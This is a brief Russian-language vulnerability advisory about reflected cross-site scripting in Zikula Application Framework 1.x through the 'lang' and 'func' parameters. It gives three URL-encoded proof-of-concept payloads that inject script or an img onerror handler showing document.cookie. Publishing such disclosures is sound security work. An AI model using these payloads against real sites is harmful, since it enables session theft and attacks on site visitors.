Программа: Zikula Application Framework 1.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "lang" сценарием index.php и в параметре "func" (когда "module"
установлен в любое значение). Атакующий может выполнить произвольный сценарий в
браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
Home
http://www.tst.my/index.php?module=adminpanel&type=admin&func=adminpanel&lang=en%27%22%3E%3Cimg%20src=0%20onerror=alert%28document.cookie%29%3E
http://www.tst.my/index.php?module=tour&func=exttour%27%22%3E%3Cscript%3Ealert%28234%29%3C/script%3E
http://www.tst.my/index.php?module=search&func=recent%27%22%3E%3Cimg%20src=0%20onerror=alert%28document.cookie%29%3E